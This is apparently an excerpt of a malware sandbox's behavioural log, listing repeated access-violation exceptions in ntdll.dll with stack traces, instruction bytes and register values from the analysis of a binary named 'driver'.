registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
